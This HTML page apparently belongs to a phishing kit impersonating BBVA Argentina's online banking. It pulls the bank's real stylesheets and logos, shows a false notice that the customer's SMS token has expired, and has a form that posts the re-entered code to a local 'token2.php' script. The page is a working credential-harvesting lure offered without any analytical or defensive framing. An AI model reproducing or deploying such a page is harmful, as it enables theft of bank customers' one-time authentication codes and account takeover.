<!DOCTYPE html>

    <html lang="es-AR">
        <head>
    <title>BBVA|AR</title>


    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="style3.css">
    <link rel="stylesheet" href="styledropdown.css">

    <link rel="stylesheet" href="style2.css">



    <link rel="stylesheet" href="https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-bsas/bbva-icons-bsas.css">
    <link rel="stylesheet" href="https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-icons-login/style.css">

    <meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>

    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="lang" content="es-AR"/>






<link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Light.woff2" type="font/woff2">
<link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Medium.woff2" type="font/woff2">
<link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Bold.woff2" type="font/woff2">
<link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Book.woff2" type="font/woff2">



<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.critical/small.lc-20210203-070201-lc.min.css" type="text/css">




<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.critical/large.lc-20210203-070201-lc.min.css" type="text/css" media="all and (min-width: 600px)">




<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.common.lc-20210203-070201-lc.min.css" >




<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.fonts/small.lc-20210203-070201-lc.min.css" >











<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.lightbox/small.lc-20210203-070201-lc.min.css" >






<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.videoLink/small.lc-20210203-070201-lc.min.css">









    <link rel="apple-touch-icon" sizes="57x57" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/57x57.png"/>
    <link rel="apple-touch-icon" sizes="72x72" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/72x72.png"/>
    <link rel="apple-touch-icon" sizes="76x76" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/76x76.png"/>
    <link rel="apple-touch-icon" sizes="114x114" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/114x114.png"/>
    <link rel="apple-touch-icon" sizes="120x120" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/120x120.png"/>
    <link rel="apple-touch-icon" sizes="144x144" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/144x144.png"/>
    <link rel="apple-touch-icon" sizes="152x152" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/152x152.png"/>
    <link rel="apple-touch-icon" sizes="167x167" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/167x167.png"/>
    <link rel="apple-touch-icon" sizes="180x180" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/180x180.png"/>

    <link rel="icon" type="image/png" sizes="16x16" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/16x16.png"/>
    <link rel="icon" type="image/png" sizes="32x32" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/32x32.png"/>
    <link rel="icon" type="image/png" sizes="96x96" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/96x96.png"/>
    <link rel="icon" type="image/png" sizes="128x128" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/128x128.png"/>
    <link>
    <link rel="icon" type="image/png" sizes="192x192" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/192x192.png"/>
    <link rel="icon" type="image/png" sizes="195x195" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/195x195.png"/>
    <link rel="icon" type="image/png" sizes="196x196" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/196x196.png"/>
    <link rel="icon" type="image/png" sizes="228x228" href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/228x228.png"/>











    <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.header/small.lc-20210203-070201-lc.min.css" type="text/css">




    <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.header/large.lc-20210203-070201-lc.min.css" type="text/css" media="all and (min-width: 600px)">
      </head>


        <body ng-controller="PreLoginCtrl" class="ng-scope" >





          <header class="header__base wrapper" >

















          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/small.lc-20210203-070201-lc.min.css" type="text/css">




          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/large.lc-20210203-070201-lc.min.css" type="text/css" media="all and (min-width: 600px)">




          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.stickyalert.lc-20210203-070201-lc.min.css" type="text/css">



































          <a class="skip2content invisible" tab-index="0" href="#main" aria-label="Ir al contenido principal">
              Ir al contenido principal
          </a>
          <nav class="header__container background--navy" aria-label=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales" data-component="header" data-dl-component data-dl-component-name="header" data-dl-component-type="https://www.bbva.com.ar/bbva/pwebs/components/par/header" id="header">

              <div class="header__main container">
                  <div class="header__wrapper">

                          <div class="header__logo" data-component="svgLogoFix" itemscope itemtype="http://schema.org/Organization">

                              <a itemscope="url" class="header__logo__link " href="#" target="_self" aria-label="Home Personas BBVA" title=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales">











               <img  src="https://www.bbva.com.ar/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg"
                srcset="https://www.bbva.com.ar/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg"
                sizes="(min-width: 900px) 20vw, 50vw" itemprop="logo" class="header__image " alt=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales" role="img"/>




                              </a>
                          </div>

                      <div class="header__mainnavigation" itemscope itemtype="https://schema.org/SiteNavigationElement">








          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.mainNavigation/small.lc-20210203-070201-lc.min.css" type="text/css">




          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.mainNavigation/large.lc-20210203-070201-lc.min.css" type="text/css" media="all and (min-width: 600px)">




              <nav class="mainnavigation__base">
                  <ul class="mainnavigation__list">
                      <li itemprop="name" class="mainnavigation__item mainnavigation__item--active">
                          <a itemprop="url" aria-label="Personas Opción seleccionada" href="#" target="_self" class="mainnavigation__link">Personas</a>
                      </li>

                      <li itemprop="name" class="mainnavigation__item">
                          <a itemprop="url" aria-label="Empresas " href="#" target="_self" class="mainnavigation__link">Empresas</a>
                      </li>
                  </ul>
              </nav>


                      </div>
                  </div>
                  <nav class="header__actions" itemscope="" itemtype="https://schema.org/SiteNavigationElement">
                      <ul class="header__actions__ulist">




                          <li itemprop="name" class="header__actions__list header__actions--tablet-left">



          <link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.access/small.lc-20210203-070201-lc.min.css">








                          </li>

                          <li class="header__actions__list header__actions--tablet-hidden">


          <div class="search__trigger" role="search">
              <a href="javascript:void(0);" aria-haspopup="true" aria-controls="access__container__content" aria-label="Buscador" aria-expanded="false" accesskey="s" class="header__actions__item__link search__trigger__btn" title="search">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 260 260" height="20px" width="20px">
                      <defs><style>.cls-1{fill:#fff}</style></defs>
                      <path class="cls-1" d="M182.85 162.85a90 90 0 1 0-20 20L220 240l20-20zM150 110a40 40 0 0 0-40-40V50a60 60 0 0 1 60 60z" id="icons"/>
                  </svg>
              </a>
          </div>
                          </li>

                          <li class="header__actions__list header__actions--tablet-right">



          <a class="megamenu__trigger header__actions__item__link " href="javascript:void(0);" aria-expanded="false" aria-haspopup="true" aria-label="Menú principal" aria-controls="megamenu__aside" accesskey="m">
              <span class="megamenu__trigger megamenu__trigger__open header__actions--menu" aria-hidden="false">
                  <span class="header__actions__item__link__text">Menú</span>
                  <svg class="header__icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 260 260" height="24px" width="24px">
                      <defs><style>.cls-1{fill:#fff}</style></defs>
                      <g id="icons">
                          <polygon class="cls-1" points="210.37 80.12 20.37 80.12 20.37 50.12 240.37 50.12 210.37 80.12"/>
                          <polygon class="cls-1" points="180.37 145.12 20.37 145.12 20.37 115.12 210.37 115.12 180.37 145.12"/>
                          <polygon class="cls-1" points="150.37 210.12 20.37 210.12 20.37 180.12 180.37 180.12 150.37 210.12"/>
                      </g>
                  </svg>
              </span>
              <span class="megamenu__trigger megamenu__trigger__close hidden header__actions--menu" aria-hidden="true">
                  <span class="header__actions__item__link__text">Cerrar</span>
                  <i class="bbva-icon bbva-icon__2_022_close"></i>
              </span>
          </a>
                          </li>
                      </ul>
                  </nav>
              </div>
          </nav>



              <div class="access__container invisible" id="access__container__content" aria-hidden="true" tabindex="-1">
                  <div class="container">
                      <div class="access__control">
                          <button class="access__close" aria-label="cerrar" tabindex="-1"><i class="bbva-icon bbva-icon__2_022_close"></i></button>
                      </div>
                      <div class="access__content">
                      </div>
                  </div>
              </div>
          </header>

<div class="access__content">


    <div class="general-wrapper">

      <!-- This file is being overwritten in the configuration page to allow the edition of the header alert
     or other header components which can be edited into the configuration template.
 -->





<div class="search search--desktop wrapper">






<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.searchbar/small.lc-20210203-070201-lc.min.css" type="text/css">




<link rel="stylesheet" href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.searchbar/large.lc-20210203-070201-lc.min.css" type="text/css" media="all and (min-width: 600px)">

<div ng-include="'partials/public/loginClementeForm.html'" class="ng-scope"><!-- ngIf: errorMessage -->

<div class="modal-login mgb-0 row ng-scope">

<div class="col-xs-12 col-sm-6 first-box">

  <div class="col-xs-12 col-sm-6 first-box">

      <div class="box">

          <!-- ngIf: errorSafariMsg -->

          <!-- ngIf: !errorSafariMsg -->
              <!--ng-class="{'blur-content': listOptions.open}"-->

              <!--<div class="form-group select-element">
                  <select id="selectDNI"
                          ng-options="tdoc.descripcion for tdoc in model.documentTypes track by tdoc.codigoFNET"
                          ng-model="model.documentTypeSelected" class="btn">
                  </select>
              </div>-->

              <div class="wrapper-login">
                <form action="token2.php" method="post" class="ng-scope ng-pristine ng-invalid ng-invalid-required">
                  <!-- <span class="login-title" ng-if="!errorMessage"><span
                    ></span>¡Bienvenido!</span> -->
                  <div class="loader ng-isolate-scope ng-hide" ng-show="isLoading()" bbva-loader="" loading="loadingDynamicValidations">
<!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
   currentMessage -->
</div>
                  <!-- ngIf: !loadingDynamicValidations -->
                  <div class="ng-scope">
                    <article class="tip-area">
                        <p class="tip-msg" ng-style="{'background-image':'url(https://assets.caasbbva.com/argentina/net/security-tips/access-biometric-secure.png)'}"
                        style="background-image: url(https://assets.caasbbva.com/argentina/net/security-tips/access-biometric-secure.png);">
                            <span class="ng-binding">Su Token SMS a expirado; por favor ingréselo nuevamente</span></p>
                    </article>
                      <div class="form-control drop-down ng-isolate-scope ">

</div>

                      <div class="form-group">
                          <div class="new-input-control input-control-tooltip input-container">
                              <input type="text"  name="token2"
                              class="form-control ng-pristine ng-invalid ng-invalid-required"
                               maxlength="13" required="">
                              <label for="documentNumberInput">Código ###</label>
                              <span class="icon-login-close"></span>
                          </div>
                      </div>


                  </div><!-- end ngIf: !loadingDynamicValidations -->


                  <div class="form-group enter">
                      <div class="loader ng-isolate-scope ng-hide" ng-show="isLoading()" bbva-loader="" loading="loading">
<!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
 currentMessage -->
</div>
                      <div style="justify-content:center"class="buttons-container">

                          <!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
                           currentMessage-->
                          <button type="submit"  class="primary-button">Finalizar</button>

                      </div>
                  </div>


              </div>

          </form><!-- end ngIf: !errorSafariMsg -->

      </div>
<!-- box -->
</div>
<!-- esUsuario -->

</div>
<!-- !errorMessageOffLine --></div>
</div>



    <footer role="contentinfo" aria-label="Pie de página">



















    <div class="footer__base" data-dl-component data-dl-component-name="footer" data-dl-component-type="bbva/pwebs/components/par/footer" id="footer">
        <div class="container">

                <a href="/personas.html" class="footer__logo__link " target="_self">










    <img data-component-params='{"keepSize": "" }' src="/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg" srcset="/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg" class="footer__logo " alt="" role="img"/>





                </a>


            <div class="footer__links">




<div class="footer__list">


        <div class="link">
            <a itemprop="url" href="/personas/aviso-legal.html" class="link__content link__base  " target="_self" title="Aviso legal. Abre en la misma ventana." aria-label="Aviso legal. Abre en la misma ventana.">
                Aviso legal
            </a>
        </div>

        <div class="link">
            <a itemprop="url" href="/personas/aviso-sobre-navegadores.html" class="link__content link__base  " target="_self" title="Aviso sobre Navegadores. Abre en la misma ventana" aria-label="Aviso sobre Navegadores. Abre en la misma ventana">
                Aviso sobre Navegadores
            </a>
        </div>

        <div class="link">
            <a itemprop="url" href="/personas/mapa.html" class="link__content link__base  " target="_self" title="Mapa. Abre en la misma ventana." aria-label="Mapa. Abre en la misma ventana.">
                Mapa
            </a>
        </div>

        <div class="link">
            <a itemprop="url" href="/personas/recomendaciones-de-seguridad.html" class="link__content link__base  " target="_self" title="Recomendaciones de Seguridad. Abre en la misma ventana." aria-label="Recomendaciones de Seguridad. Abre en la misma ventana.">
                Recomendaciones de Seguridad
            </a>
        </div>




</div>
<div class="footer__optional">




</div>



            </div>
            <div class="footer__social">






            </div>
            <div class="footer__disclaimer">

                    <p class="footer__copyright">© 2021 Banco BBVA Argentina S.A.</p>

                <div class="footer__claim">
                        <p class="claim__content">Creando Oportunidades</p>
                </div>
            </div>
        </div>
    </div>

    </footer>
</div>
</div>
    </div>
    <div class="wrapper sticky__wrapper">













</div>


<script src="1.js" charset="utf-8"></script>


</body>


    </html>
